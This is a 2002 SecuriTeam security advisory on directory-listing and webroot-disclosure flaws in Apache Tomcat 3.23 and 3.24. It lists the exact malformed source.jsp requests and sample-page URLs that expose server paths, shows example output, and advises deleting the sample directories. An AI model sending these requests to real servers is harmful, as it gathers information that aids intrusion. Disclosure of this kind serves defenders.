[UNIX] Tomcat Multiple Directory Listing and Webroot Location Vulnerabilities

From: support@securiteam.com
Date: 05/30/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Thu, 30 May 2002 07:55:34 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Tomcat Multiple Directory Listing and Webroot Location Vulnerabilities
------------------------------------------------------------------------

SUMMARY

 <http://jakarta.apache.org/tomcat/> Tomcat is the free open source Java
server. Multiple directory listing and web root location disclosure
vulnerabilities have been found in the product, allowing a remote attacker
to reveal sensitive information on the remote host.

DETAILS

Vulnerable systems:
 * Apache Tomcat Java server versions 3.23 and 3.24

source.jsp
Normally source.jsp is used to look at the source code of programs within
the examples directories. A typical request is:
http://webserver:80/examples/jsp/source.jsp?/jsp/num/numguess.jsp

We have found by using source.jsp with a malformed input a directory
listing is displayed and the location of the web root is sometimes
disclosed.

The vulnerabilities may only work on port 8080 rather than port 80,
dependant on how the webserver has been configured with Tomcat.

Exploits:
A) Requesting the following URL:
http://webserver:80/examples/jsp/source.jsp??

Gives the directory listing and webroot on 3.23, 3.24 just gives a
directory listing.

<title>Directory Listing</title>
<base href="file://localhost/"WEBROOT"/webapps/examples/"><h1>
/"WEBROOT"/webapps/examples</h1>
<hr>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32
height=32>
<a href="images">images</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="jsp">jsp</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="META-INF">META-INF</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="servlets">servlets</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="WEB-INF">WEB-INF</a><br>

B) Requesting the following URL:
http://webserver:80/examples/jsp/source.jsp?/jsp/

Gives the directory listing and webroot on 3.23, 3.24 just gives a
directory listing on a subdirectory.
<title>Directory Listing</title>
<base href="file://localhost/"WEBROOT"/webapps/examples/jsp/"><h1>
/"WEBROOT"/webapps/examples/jsp</h1>
<hr>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32
height=32>
<a href="cal">cal</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="checkbox">checkbox</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="colors">colors</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="dates">dates</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="error">error</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="forward">forward</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="include">include</a><br><img align=middle
src="doc:/lib/images/ftp/file.gif" width=32 height=32>
<a href="index.html">index.html</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="jsptoserv">jsptoserv</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="num">num</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="plugin">plugin</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="security">security</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="sessions">sessions</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="simpletag">simpletag</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="snp">snp</a><br><img align=middle
src="doc:/lib/images/ftp/file.gif" width=32 height=32>
<a href="source.jsp">source.jsp</a><br>

Solution:
Delete the samples directory if its not needed.

The /test/realPath.jsp sample:
An example program is provided with tomcat under the http://webserver/test
directory that gives the location of the webroot.

The test page of "http://webserver/test" displays the following message:
"This is the home page of the test hierarchy. It does not do too much good
to look at it directly... Instead, why don't you run the tests to find out
what you might want to know.

Oh, by the way, merry christmas.. :)"

The vulnerabilities may only work on port 8080 rather than port 80,
dependant on how the webserver has been configured with Tomcat.

A) Requesting the following URL:
http://webserver/test/realPath.jsp

Displays the following:
The virtual path is /test/realPath.jsp

The real path is "WEBROOT"/test/test/realPath.jsp

The real path is "WEBROOT"/test/realPath.jsp

Solution:
Delete the realPath.jsp program.

Example programs:
Tomcat comes with a selection of example programs that displays the
location of the webroot with no input, when Tomcat is installed with
default configuration.

The vulnerabilities may only work on port 8080 rather than port 80,
dependant on how the webserver has been configured with Tomcat.

Requesting the following URLs:
http://webserver/test/jsp/pageInfo.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/buffer1.jsp
http://webserver/test/jsp/buffer2.jsp
http://webserver/test/jsp/buffer3.jsp
http://webserver/test/jsp/buffer4.jsp
http://webserver/test/jsp/comments.jsp
http://webserver/test/jsp/extends1.jsp
http://webserver/test/jsp/extends2.jsp
http://webserver/test/jsp/pageAutoFlush.jsp
http://webserver/test/jsp/pageDouble.jsp
http://webserver/test/jsp/pageExtends.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/pageInfo.jsp
http://webserver/test/jsp/pageInvalid.jsp
http://webserver/test/jsp/pageIsErrorPage.jsp
http://webserver/test/jsp/pageIsThreadSafe.jsp
http://webserver/test/jsp/pageLanguage.jsp
http://webserver/test/jsp/pageSession.jsp
http://webserver/test/jsp/declaration/IntegerOverflow.jsp

Will result in an error being displayed that will contain the true path
used in the tested server's configuration.

Solution:
Delete the samples directory if not needed.

ADDITIONAL INFORMATION

The information has been provided by
<mailto:richard.brain@procheckup.com> Richard Brain.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages